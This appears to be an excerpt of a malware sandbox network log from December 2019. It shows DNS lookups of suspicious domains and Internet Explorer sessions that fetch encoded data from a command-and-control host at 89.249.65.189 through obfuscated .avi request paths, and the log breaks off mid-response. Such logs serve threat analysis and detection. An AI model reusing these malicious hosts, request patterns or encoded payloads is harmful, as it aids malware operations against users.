Dec 9, 2019 17:30:18.176856995 CET	192.168.2.2	8.8.8.8	0x8eec	Standard query (0)	hiteronak.icu	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:20.482105017 CET	192.168.2.2	8.8.8.8	0x4aac	Standard query (0)	marvellstudio.online	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:20.544868946 CET	192.168.2.2	8.8.8.8	0x328f	Standard query (0)	abrakam.site	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:22.851192951 CET	192.168.2.2	8.8.8.8	0xec28	Standard query (0)	ublaznze.online	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:25.399101019 CET	192.168.2.2	8.8.8.8	0x3b1e	Standard query (0)	sutsyiekha.casa	A (IP address)	IN (0x0001)
Dec 9, 2019 17:31:56.287745953 CET	192.168.2.2	8.8.8.8	0x4f19	Standard query (0)	laddloanalao.xyz	A (IP address)	IN (0x0001)
Dec 9, 2019 17:31:58.569952965 CET	192.168.2.2	8.8.8.8	0xc0cc	Standard query (0)	laddloanalao.xyz	A (IP address)	IN (0x0001)
Dec 9, 2019 17:32:11.189781904 CET	192.168.2.2	8.8.8.8	0xac5	Standard query (0)	gmail.com	A (IP address)	IN (0x0001)
Dec 9, 2019 17:32:54.225445986 CET	192.168.2.2	8.8.8.8	0x4090	Standard query (0)	laddloanalao.xyz	A (IP address)	IN (0x0001)
Dec 9, 2019 17:33:09.668418884 CET	192.168.2.2	8.8.8.8	0xa3a6	Standard query (0)	laddloanalao.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 9, 2019 17:30:13.214185953 CET	8.8.8.8	192.168.2.2	0xb088	No error (0)	makretplaise.xyz		192.64.119.156	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:13.251945972 CET	8.8.8.8	192.168.2.2	0xefac	No error (0)	makretplaise.xyz		192.64.119.156	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:13.485836029 CET	8.8.8.8	192.168.2.2	0xaa31	Name error (3)	sdkscontrol.pw	none	none	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:15.781606913 CET	8.8.8.8	192.168.2.2	0xe96d	No error (0)	sutsyiekha.casa		94.100.28.184	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:15.817152977 CET	8.8.8.8	192.168.2.2	0xb082	No error (0)	sutsyiekha.casa		94.100.28.184	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:15.911938906 CET	8.8.8.8	192.168.2.2	0x15cd	Name error (3)	udatapost.red	none	none	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:18.210606098 CET	8.8.8.8	192.168.2.2	0x8eec	Name error (3)	hiteronak.icu	none	none	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:20.516124964 CET	8.8.8.8	192.168.2.2	0x4aac	Name error (3)	marvellstudio.online	none	none	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:20.580611944 CET	8.8.8.8	192.168.2.2	0x328f	Name error (3)	abrakam.site	none	none	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:22.885174036 CET	8.8.8.8	192.168.2.2	0xec28	Name error (3)	ublaznze.online	none	none	A (IP address)	IN (0x0001)
Dec 9, 2019 17:30:25.434479952 CET	8.8.8.8	192.168.2.2	0x3b1e	No error (0)	sutsyiekha.casa		94.100.28.184	A (IP address)	IN (0x0001)
Dec 9, 2019 17:31:56.325609922 CET	8.8.8.8	192.168.2.2	0x4f19	No error (0)	laddloanalao.xyz		89.249.65.189	A (IP address)	IN (0x0001)
Dec 9, 2019 17:31:58.603707075 CET	8.8.8.8	192.168.2.2	0xc0cc	No error (0)	laddloanalao.xyz		89.249.65.189	A (IP address)	IN (0x0001)
Dec 9, 2019 17:32:11.231797934 CET	8.8.8.8	192.168.2.2	0xac5	No error (0)	gmail.com		216.58.201.101	A (IP address)	IN (0x0001)
Dec 9, 2019 17:32:54.261190891 CET	8.8.8.8	192.168.2.2	0x4090	No error (0)	laddloanalao.xyz		89.249.65.189	A (IP address)	IN (0x0001)
Dec 9, 2019 17:33:09.701975107 CET	8.8.8.8	192.168.2.2	0xa3a6	No error (0)	laddloanalao.xyz		89.249.65.189	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

laddloanalao.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.2	49228	89.249.65.189	80	C:\Program Files\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Dec 9, 2019 17:31:56.405203104 CET	173	OUT	GET /images/sCdH2p9rC/QEWUjhcskJhtMW9G0Ob3/8ujas9efG6k7NSOXraz/KyFwMBjnUtN0zWrGl7dzfE/Iz2JvLTs0tQal/txJUM0Zx/znIHrFkN_2FASixt6Ws7SB8/xgoZDz4pOc/2RHMQbhDsoScncwUV/_2FIDsyvf/XXEf.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: it-IT User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: laddloanalao.xyz DNT: 1 Connection: Keep-Alive
Dec 9, 2019 17:31:56.800844908 CET	404	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: laddloanalao.xyz DNT: 1 Connection: Keep-Alive Cookie: PHPSESSID=m8dpt3lkbmq7bj50qjk4viijg2; lang=en

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	89.249.65.189	80	192.168.2.2	49228	C:\Program Files\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Dec 9, 2019 17:31:56.454516888 CET	174	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2019 16:31:56 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=m8dpt3lkbmq7bj50qjk4viijg2; path=/; domain=.laddloanalao.xyz Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: lang=en; expires=Wed, 08-Jan-2020 16:31:56 GMT; path=/; domain=.laddloanalao.xyz Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 33 36 33 31 30 0d 0a 59 30 57 74 78 72 39 39 62 66 75 6b 64 52 45 67 67 56 59 68 74 4d 30 72 44 6b 78 78 66 57 41 6e 76 7a 62 30 50 6f 39 69 49 59 53 47 53 58 51 37 78 4e 51 41 70 62 30 32 4d 46 4a 35 43 62 63 7a 50 58 6c 52 67 4d 2b 6e 51 32 72 6e 2b 78 56 78 61 6b 4b 48 4d 4e 54 57 52 67 4f 6c 4a 69 52 65 65 68 75 54 66 32 75 59 4f 34 38 74 6a 37 67 71 6b 37 2b 54 79 37 4d 44 31 64 4f 2f 2f 55 4a 43 63 36 44 73 76 69 72 32 33 6f 4a 4e 73 72 45 65 5a 67 4d 79 50 4a 2b 49 65 45 67 64 6e 32 78 79 57 4f 48 67 36 76 2b 50 78 59 58 62 57 61 76 52 6a 6d 58 2b 56 44 35 2b 76 74 74 75 48 51 4e 78 34 37 53 36 2f 45 32 4a 4f 31 64 75 37 58 63 51 66 78 6e 63 46 44 46 4e 74 45 56 46 47 5a 70 53 67 37 58 39 68 61 2b 63 68 37 66 71 41 52 47 7a 6e 69 2b 41 59 65 65 78 6d 62 6c 2b 2f 33 74 5a 51 67 4a 49 79 76 76 57 6b 30 6e 78 79 48 4f 48 4d 62 41 39 76 2b 65 2f 35 48 6b 45 52 69 6a 65 68 6d 7a 38 36 62 37 37 72 34 4e 75 4e 52 76 45 50 68 39 36 6d 4b 69 38 44 76 77 2b 2b 36 6d 41 6c 46 33 57 53 6a 6c 43 58 36 57 4f 69 59 76 4a 34 76 72 55 37 68 45 48 78 44 51 61 37 78 57 4e 72 6e 45 7a 64 4f 32 79 6a 2b 4b 46 54 51 39 76 6f 31 30 75 7a 43 63 53 65 4b 4b 32 47 43 31 49 62 57 49 78 53 4d 75 2b 42 45 46 6e 4c 4c 33 42 78 64 36 4d 72 50 4f 55 59 6d 76 35 58 71 78 61 57 45 4c 45 33 54 67 46 58 6b 6f 6a 57 75 33 4d 6f 67 2f 32 75 49 46 47 58 63 38 45 73 71 6a 44 36 42 46 45 37 36 79 55 6a 62 4c 6c 5a 45 61 41 41 5a 46 4a 72 79 6d 66 47 6f 7a 79 65 43 59 7a 6f 6d 62 34 4c 66 53 5a 54 69 33 42 37 74 6a 48 51 46 55 5a 33 5a 6d 53 37 6a 30 4b 57 67 2f 6b 6f 54 66 51 79 50 6c 36 50 4f 62 49 6c 42 66 4f 69 44 43 7a 48 46 7a 75 62 6f 38 45 65 45 5a 79 6e 56 53 4e 77 74 45 55 53 34 61 56 48 69 4c 62 57 6a 37 71 61 41 46 44 53 70 44 4b 46 37 78 49 46 78 65 4b 51 6b 34 7a 53 59 76 68 43 2f 35 74 31 53 38 75 76 39 33 63 57 48 6a 47 68 30 73 34 53 5a 6e 7a 6b 69 63 59 46 38 57 73 30 55 38 71 33 67 36 79 66 43 4e 6c 30 Data Ascii: 36310Y0Wtxr99bfukdREggVYhtM0rDkxxfWAnvzb0Po9iIYSGSXQ7xNQApb02MFJ5CbczPXlRgM+nQ2rn+xVxakKHMNTWRgOlJiReehuTf2uYO48tj7gqk7+Ty7MD1dO//UJCc6Dsvir23oJNsrEeZgMyPJ+IeEgdn2xyWOHg6v+PxYXbWavRjmX+VD5+vttuHQNx47S6/E2JO1du7XcQfxncFDFNtEVFGZpSg7X9ha+ch7fqARGzni+AYeexmbl+/3tZQgJIyvvWk0nxyHOHMbA9v+e/5HkERijehmz86b77r4NuNRvEPh96mKi8Dvw++6mAlF3WSjlCX6WOiYvJ4vrU7hEHxDQa7xWNrnEzdO2yj+KFTQ9vo10uzCcSeKK2GC1IbWIxSMu+BEFnLL3Bxd6MrPOUYmv5XqxaWELE3TgFXkojWu3Mog/2uIFGXc8EsqjD6BFE76yUjbLlZEaAAZFJrymfGozyeCYzomb4LfSZTi3B7tjHQFUZ3ZmS7j0KWg/koTfQyPl6PObIlBfOiDCzHFzubo8EeEZynVSNwtEUS4aVHiLbWj7qaAFDSpDKF7xIFxeKQk4zSYvhC/5t1S8uv93cWHjGh0s4SZnzkicYF8Ws0U8q3g6yfCNl0
Dec 9, 2019 17:31:56.454540968 CET	176	IN	Data Raw: 76 54 42 66 2b 6e 37 32 74 6d 43 55 4e 59 51 64 56 4e 77 72 62 4a 61 36 61 35 76 56 52 4c 73 48 66 4c 36 6f 37 42 33 2f 2f 50 47 45 66 4a 7a 50 56 47 4d 47 62 57 71 75 6c 66 6b 71 37 75 67 2f 54 46 63 63 4f 78 54 79 5a 77 52 75 30 61 31 6a 58 44 Data Ascii: vTBf+n72tmCUNYQdVNwrbJa6a5vVRLsHfL6o7B3//PGEfJzPVGMGbWqulfkq7ug/TFccOxTyZwRu0a1jXDJc4mx9XjAV1BgrMCFRKz+gb8d6+6tYxtQuVjVTYXyVpfd8usuxbg7KhMfwurfTveSFo9gURCEnvkskGyHdcKQ17g9rk8h2DK3OR5eXwmsEq4/HWptu4I1L2z4NCwFEXj9N1MY/VI/qUu/qdDl2bCjPxo4T3fL+HBw
Dec 9, 2019 17:31:56.454554081 CET	177	IN	Data Raw: 63 67 68 4d 32 34 44 71 45 4e 2b 69 2f 77 2b 43 6b 44 61 6b 33 61 68 58 6b 38 73 52 53 34 2b 50 45 39 74 68 75 65 48 4f 2b 64 4b 2f 4a 48 66 68 67 68 53 63 2b 71 77 78 6c 31 62 31 37 39 55 4f 77 5a 32 67 37 6a 74 69 55 7a 61 77 36 65 46 71 39 50 Data Ascii: cghM24DqEN+i/w+CkDak3ahXk8sRS4+PE9thueHO+dK/JHfhghSc+qwxl1b179UOwZ2g7jtiUzaw6eFq9P9O/U3s6n5/yB6pEVNn2g0iJvs5ccgqC3y1uxL1l0L1FB4QJzRW9v9Imaa4A3pnvSRiOFOOxUmxAtsP87XUGKB+Z3Od6F5ct999XOms2vzioaTVYotvfkngcNzHkc9bMmgmaYxmStT9STwB/fYR/m/iniCMLoLt1P5
Dec 9, 2019 17:31:56.454566956 CET	178	IN	Data Raw: 4f 70 6b 49 39 30 63 47 50 66 78 32 46 39 6e 75 68 63 5a 6d 48 68 46 57 35 49 36 4f 50 42 63 4d 35 2f 7a 39 39 78 4f 35 4f 57 56 41 50 6a 4a 6d 31 32 32 4d 74 38 76 4a 35 4f 2f 71 69 6d 2b 6c 56 55 77 57 5a 7a 61 78 39 4b 61 62 6e 2f 50 62 72 65 Data Ascii: OpkI90cGPfx2F9nuhcZmHhFW5I6OPBcM5/z99xO5OWVAPjJm122Mt8vJ5O/qim+lVUwWZzax9Kabn/PbrecEixHtOSbrnLuP+vbQOuM2Y6mx1tImweVPDWSRH/nnl5YecOuuoOM/Wb1LlGuW56ZqRhEMYSVy8ehJzWthzLTptpN/fWwKGZ+JEBGqQz04payrR0VF37ddsSIqFjrEuszRS9Ezo6qixRsLmq6beoSg3DUNCOibqMV
Dec 9, 2019 17:31:56.454581976 CET	179	IN	Data Raw: 41 6a 4e 43 6f 50 61 79 39 61 78 43 41 30 76 4e 35 42 2b 59 62 53 39 35 47 68 4f 75 53 32 73 6d 46 6f 38 6d 32 46 61 4f 48 61 57 4f 31 61 63 44 4d 44 43 46 39 35 47 78 78 49 31 64 76 47 66 79 62 70 77 4a 4b 67 53 51 5a 71 57 75 67 48 50 71 4f 2f Data Ascii: AjNCoPay9axCA0vN5B+YbS95GhOuS2smFo8m2FaOHaWO1acDMDCF95GxxI1dvGfybpwJKgSQZqWugHPqO/SziQRWsZ760Zh1seqwNetfpZtXdnlAbjp/uNdUAvbOxvvCN4NwXuIycfP3PqfsRWgtB+RC3a1RQMiqajgROfuCZBxVebz/e3Wxzyj1oeTbfwUK+m9kX5c6XiIt8qnHMuOIfdwcgBcPPlKEI6L57yHi7/mlAhjJMvk
Dec 9, 2019 17:31:56.454597950 CET	180	IN	Data Raw: 4f 41 2b 78 61 61 52 66 78 57 72 44 2f 53 78 35 4e 44 4d 79 34 75 53 68 36 57 2b 79 65 33 59 2f 2b 62 71 4a 6a 75 33 45 49 6c 6a 43 4b 46 2b 47 41 6c 64 31 7a 34 67 62 66 71 33 77 70 2b 36 44 64 59 58 74 4e 77 30 79 61 49 66 62 30 75 5a 48 4b 67 Data Ascii: OA+xaaRfxWrD/Sx5NDMy4uSh6W+ye3Y/+bqJju3EIljCKF+GAld1z4gbfq3wp+6DdYXtNw0yaIfb0uZHKglcMnsHfbz9fLqp6p8REaF7ZVILGuoup4L83IrVzlSmOApUCiL58AfbbYZgah6JM1DaTJ8Gr9dDZpBz3H3bwAgWOCvTNUUN4IBK+vvZX+1uRDIMmjuHCxVJkhpQ6YOwRdJOMU0rj+/UzGSItHuTCB6b0NWLkaEmcFX
Dec 9, 2019 17:31:56.454612970 CET	182	IN	Data Raw: 63 70 34 35 61 55 36 51 38 30 6d 6c 74 35 77 6a 48 69 6d 62 49 63 46 77 65 45 39 43 67 46 51 33 52 45 32 4e 76 30 65 72 4a 38 62 36 36 54 71 54 5a 49 64 47 34 50 54 6b 42 4d 45 72 6e 47 6b 49 6a 32 6d 57 66 4d 6d 31 30 31 4f 48 32 4a 6b 75 51 59 Data Ascii: cp45aU6Q80mlt5wjHimbIcFweE9CgFQ3RE2Nv0erJ8b66TqTZIdG4PTkBMErnGkIj2mWfMm101OH2JkuQYlIaB8wcf5ngz6yur6pWejgDgyQtnziVbvWT4Vf76bDP5+9/M1SU+si7uMixIP+fQoWuNG2reLLwteypXfEq1Ijl+ts+oPzEXhVa+X36lWVhosShcIHYZwc+cFGi+4UMC1Oo1rKGV9atZc7RUbrzzfBRyc9iJShy/o
Dec 9, 2019 17:31:56.454627991 CET	183	IN	Data Raw: 46 39 31 72 5a 51 42 6c 6b 6e 4c 4c 48 74 71 63 6b 6a 47 71 75 48 77 59 5a 4d 49 77 56 69 6c 75 51 76 34 67 7a 69 66 48 73 47 73 5a 6a 4e 2b 47 78 32 42 50 63 4f 43 4d 30 62 67 2f 41 74 67 48 6b 77 77 57 56 50 73 38 76 52 6c 6e 6d 30 41 73 65 7a Data Ascii: F91rZQBlknLLHtqckjGquHwYZMIwViluQv4gzifHsGsZjN+Gx2BPcOCM0bg/AtgHkwwWVPs8vRlnm0AsezJiNgk76LCYAk02pFBmjM6knT1BFuWHIOPOP2r4T9QxFYTnG/b2DhAzSW+6uDFVgdrb0eGNpVMe/L+uyAMuOXY9nM2rAHcV5U6gI/FWDN2SfFjKljXw/dYfx05Hm0MHWhZTEwnbgeoyf0/BhK4r9LUVWes07hduOWE
Dec 9, 2019 17:31:56.455190897 CET	184	IN	Data Raw: 51 35 35 33 58 6a 62 57 77 55 74 63 31 6d 31 6b 6d 73 6a 4c 66 67 7a 50 69 70 52 54 4f 67 4a 49 42 42 52 36 43 57 31 45 61 7a 33 46 2b 79 44 57 38 65 6f 56 52 39 48 33 74 58 78 48 6c 58 4d 55 59 6b 54 69 4f 76 36 46 74 68 6c 6d 66 48 69 6c 7a 31 Data Ascii: Q553XjbWwUtc1m1kmsjLfgzPipRTOgJIBBR6CW1Eaz3F+yDW8eoVR9H3tXxHlXMUYkTiOv6FthlmfHilz1L5l37v6mP2wckCNuuTdsiyZVePx8HWDrhY19agSYJZCkZNpR1q1v7W36YIkYebvNlcJ5TQFLiI+EHvclnABv1vSRaxtknrHgIPBqw/FB6i6yRoHeOgAJEseDiMrGUEdRS+jpesadBk1R539Wd5uTRPiteQeLAhrFF
Dec 9, 2019 17:31:56.455236912 CET	185	IN	Data Raw: 76 7a 42 7a 33 32 6f 30 72 48 55 5a 6f 46 6e 74 68 46 46 61 51 35 6a 69 4e 73 31 62 74 31 56 4a 6b 32 47 68 7a 36 66 6e 4d 2f 7a 61 45 55 58 79 46 2f 72 2b 76 36 30 46 4e 75 76 73 71 6f 56 4c 4f 6d 70 42 55 75 57 54 48 6c 34 38 6d 30 6f 39 69 63 Data Ascii: vzBz32o0rHUZoFnthFFaQ5jiNs1bt1VJk2Ghz6fnM/zaEUXyF/r+v60FNuvsqoVLOmpBUuWTHl48m0o9icOJNLm6THeLEP2vX9bTm5lwiI5jttyIXrCoteZHKGZAaSVAQbpa0e3zwhmmmzYUFWPVkHK6rIzXmfvMy0NnhuzuiM8fbHBgoQEBpGL8JXYKpHbQZz7hZ/6kJLXYIyBCobOpUzwOX8b06j7mNj7bbLXAgSQ42qlrqYd
Dec 9, 2019 17:31:56.480644941 CET	187	IN	Data Raw: 73 37 49 46 4f 4e 30 6c 41 54 4c 36 6e 48 69 49 35 33 31 70 4f 56 72 71 43 67 47 53 38 47 55 6c 75 57 6f 6c 61 78 34 76 54 46 4c 44 61 51 50 47 43 75 34 42 31 30 6f 56 78 35 72 73 2b 58 6c 67 35 39 52 63 6f 70 75 73 32 47 73 4b 7a 42 32 47 61 46 Data Ascii: s7IFON0lATL6nHiI531pOVrqCgGS8GUluWolax4vTFLDaQPGCu4B10oVx5rs+Xlg59Rcopus2GsKzB2GaFS9ZB7gGya+2nV0IQyR+PJTsS0Ei7XUaWWDjQnMk/mYTpbZKllenCDfdZ7/lQk4IzSWA6pKKYOMIXiQWZHz/ezV+tvGJEY5invUQTG579J7KiGbdogSSWgLlK22Ndpf01SXTORmhdeALg3F+JiDFwJN/qb6cY77YTZ
Dec 9, 2019 17:31:56.822243929 CET	405	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2019 16:31:56 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Last-Modified: Tue, 03 Dec 2019 12:40:53 GMT ETag: "1536-598cc01bfae86" Accept-Ranges: bytes Content-Length: 5430 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/vnd.microsoft.icon Data Raw: 00 00 01 00 02 00 10 10 00 00 00 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 00 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 87 73 f7 9c 87 73 f9 9c 87 73 f7 9c 87 73 77 9c 87 72 03 ff ff ff 01 9c 87 73 09 9c 87 73 0f 9c 87 73 0d 9b 87 73 05 ff ff ff 01 9c 87 73 15 9c 87 73 c7 9c 87 73 f9 9c 87 73 f9 9c 87 73 85 9c 87 73 f9 9c 87 72 f9 9c 87 73 7b 9c 87 73 05 9c 87 73 23 9c 87 73 7f 9c 87 73 c3 9b 87 72 d3 9c 87 73 cf 9c 87 73 ad 9c 87 73 5b 9c 87 73 0d 9c 87 73 1b 9c 87 73 c5 9b 87 73 ff 9c 87 73 85 9c 87 73 f7 9c 87 73 7d 9c 87 73 07 9c 87 73 57 9c 87 72 db 9c 87 73 ab 9c 87 73 6d 9c 87 73 4b 9c 87 73 43 9c 87 73 77 9c 87 73 cf 9c 87 73 b7 9b 86 73 25 9c 87 73 21 9c 87 73 cb 9c 87 73 87 9c 87 73 7f 9c 87 73 05 9c 87 73 55 9c 87 73 e1 9c 87 73 59 9c 87 73 81 9c 87 73 df 9c 87 73 c9 9b 86 72 23 ff ff ff 01 9c 87 73 13 9c 87 73 97 9c 87 73 cd 9c 87 73 19 9c 87 72 25 9c 87 73 5b 9c 87 73 03 9c 87 73 1d 9c 87 73 d9 9c 87 73 5d 9c 87 73 0b 9b 87 72 ef 9c 87 73 53 9b 87 73 bf 9c 87 73 71 ff ff ff 01 ff ff ff 01 9c 87 73 0b 9c 87 73 a5 9c 87 73 95 9c 87 73 03 9c 87 73 03 ff ff ff 01 9c 87 73 75 9c 87 73 b5 9c 87 73 07 ff ff ff 01 9c 87 73 c1 9c 87 73 db 9c 87 73 e7 9c 87 73 41 ff ff ff 01 ff ff ff 01 ff ff ff 01 9c 86 73 25 9b 87 73 d9 9c 87 73 23 ff ff ff 01 9c 87 72 07 9c 87 72 bb 9c 87 73 5d ff ff ff 01 ff ff ff 01 9c 87 73 1b 9c 87 73 db 9c 87 73 6b 9c 87 73 03 9c 87 73 03 ff ff ff 01 ff ff ff 01 9c 87 73 03 9c 87 73 af 9c 87 73 5d ff ff ff 01 9c 87 73 0d 9c 87 72 cd 9c 87 73 37 ff ff ff 01 ff ff ff 01 9c 86 73 09 9c 87 73 c9 9c 87 72 91 9c 86 72 a3 9c 87 73 81 9c 86 72 05 ff ff ff 01 ff ff ff 01 9b 87 73 85 9c 87 73 7f ff ff ff 01 9c 87 73 0d 9c 87 73 cb 9b 87 73 37 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 69 9c 87 73 3f 9c 87 73 37 9c 87 73 13 ff ff ff 01 ff ff ff 01 9b 87 73 83 9c 87 73 7f ff ff ff 01 9c 87 73 07 9c 87 73 b9 9c 87 72 57 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 c9 9c 87 73 97 9c 87 73 a9 9c 87 73 a9 9c 87 73 97 ff ff ff 01 ff ff ff 01 9c 87 73 ab 9c 87 73 5b ff ff ff 01 ff ff ff 01 9c 87 73 73 9c 87 73 ad 9c 87 73 05 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 6d 9c 87 73 49 9c 87 73 3b 9c 87 73 07 ff ff ff 01 9c 87 73 21 9c 87 73 d3 9c 87 73 23 ff ff ff 01 9c 87 73 05 9c 87 73 1b 9b 87 73 d3 9c 87 73 51 ff ff ff 01 9b 86 73 09 9c 87 73 cb 9c 87 73 89 9b 87 72 83 9c 87 73 6d 9c 87 73 05 9c 87 72 07 9c 87 73 97 9b 87 72 91 9c 87 73 03 9c 87 73 05 9b 87 72 89 9c 87 73 07 9c 87 73 51 9c 87 73 d9 9c 87 72 4b 9c 87 73 07 9c 87 73 67 9c 86 73 27 ff ff ff 01 ff ff ff 01 9b 86 73 0d 9c 87 Data Ascii: h& ( @sssswrssssssssssrs{ss#ssrsss[sssssss}ssWrssmsKsCswsss%s!sssssUssYsssr#ssssr%s[ssss]srsSssqssssssussssssAs%ss#rrs]sssksssss]srs7ssrrsrsssss7sssis?s7sssssrWssssssss[sssssssmsIs;ss!ss#ssssQsssrsmsrsrssrssQsrKssgs's

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.2	49230	89.249.65.189	80	C:\Program Files\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Dec 9, 2019 17:31:58.637691021 CET	411	OUT	GET /images/New4cJoQvo6XtZauz/hyuqnQVHdttc/Y2fQhP_2Bvp/SwIcLle_2BgVQD/gNevLmBadoMS_2F8_2Fy6/0rM_2F8LRwLuw_2F/EauVHxmISOjoYNN/_2FY7T2el_2BlMSeFW/_2FLqyftu/fwXJdY6tuyVXii_2F47H/XDlyh_2Ba2Ay8g_2F35/F_2BBnVFrTiBOxAVL_2F4w/hBVHp.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: it-IT User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: laddloanalao.xyz DNT: 1 Connection: Keep-Alive Cookie: lang=en

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	89.249.65.189	80	192.168.2.2	49230	C:\Program Files\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Dec 9, 2019 17:31:58.684199095 CET	412	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2019 16:31:58 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=0ttv8a2l7fg9ksmcid9npnv0n7; path=/; domain=.laddloanalao.xyz Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2352 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 63 42 51 51 44 36 75 6e 2b 36 70 51 41 77 2f 36 4d 77 65 4b 6f 73 65 6a 76 6d 74 33 79 36 4d 65 66 78 74 4b 36 6f 65 6d 74 48 73 31 6f 69 4d 6f 4c 76 5a 4d 79 32 46 55 64 50 4c 53 5a 46 6e 2f 56 45 43 58 76 38 75 57 67 67 72 67 75 6a 4a 69 75 65 53 69 44 43 6c 57 7a 48 76 5a 78 41 77 78 41 48 4f 4c 51 48 51 61 4c 39 49 4b 4f 4a 2f 65 6b 56 67 68 61 54 36 79 4a 4c 7a 30 64 6e 38 56 61 59 66 77 72 58 36 7a 66 79 49 42 4d 46 34 77 6e 55 51 6e 4d 4e 38 71 51 54 52 75 35 48 2f 44 49 32 70 71 7a 4e 58 6f 64 2f 4a 49 57 42 39 36 46 38 2b 78 59 35 45 4e 49 54 75 69 7a 66 48 37 39 2f 31 79 48 4b 55 47 54 50 2b 6e 47 45 31 31 4f 65 6c 6a 45 63 63 4a 50 6d 48 4e 47 71 42 37 66 6b 55 32 61 52 73 41 43 48 49 2b 6c 57 79 54 71 5a 5a 59 47 74 39 2b 6d 6e 37 6a 47 6c 42 70 56 42 42 66 48 77 6e 75 42 4d 44 45 53 30 44 53 55 74 39 69 78 77 6a 6b 62 45 56 66 43 73 52 46 65 46 6f 65 6a 78 56 53 50 54 51 64 45 5a 48 58 53 42 6f 45 62 44 46 6c 6e 56 74 48 46 6f 38 4f 4f 41 47 43 79 34 4c 59 4f 73 49 53 50 67 6a 53 36 4a 69 65 6e 50 63 2f 6a 58 45 5a 50 75 6b 4c 62 69 6e 51 65 5a 6d 47 76 2f 2f 34 49 48 70 30 46 38 30 4b 6d 48 2f 4f 31 33 4d 71 76 36 54 56 5a 45 39 2f 36 30 66 5a 41 47 52 2b 73 74 47 4d 30 4b 6a 59 56 6f 4d 48 30 41 36 38 76 6f 65 35 53 44 31 77 41 59 75 32 30 71 36 36 4d 55 44 63 59 4d 48 54 4d 32 50 38 49 42 30 4e 68 55 54 4d 5a 56 37 59 53 41 47 53 42 71 4c 37 54 47 33 4b 39 57 63 51 34 69 31 46 4d 4f 53 6e 72 72 53 75 50 61 38 70 41 67 52 78 6c 62 33 37 37 43 42 6b 4c 52 71 41 6d 56 45 53 62 61 36 67 6f 4d 34 77 56 6d 37 7a 35 37 42 4b 32 4d 61 62 73 6d 79 4b 50 41 48 2b 57 4d 71 37 51 33 79 4c 69 33 6c 37 4e 42 52 38 39 4a 56 78 4c 71 45 6b 51 6f 6d 55 73 42 50 67 48 71 5a 31 69 6b 66 71 30 48 71 42 59 2b 4d 72 4a 70 4b 64 56 68 54 30 5a 59 4a 49 37 76 4a 37 58 49 62 61 56 77 37 78 4f 79 39 71 72 6d 5a 67 78 57 72 2b 69 54 48 54 44 52 6d 71 51 45 49 4c 43 77 67 39 2b 65 58 51 37 6b 50 2f 62 38 64 42 56 62 52 58 34 56 4c 6f 39 71 6a 43 33 6c 44 79 41 57 54 36 2b 42 63 31 35 6c 7a 68 73 51 30 49 69 43 70 73 41 77 30 35 30 61 32 75 70 2f 54 41 64 53 6c 30 73 57 68 71 43 4b 37 53 52 44 31 4d 31 45 73 52 6d 46 57 75 67 36 73 68 66 61 63 52 33 39 65 34 64 67 6b 49 6d 35 78 61 2f 70 6b 51 Data Ascii: 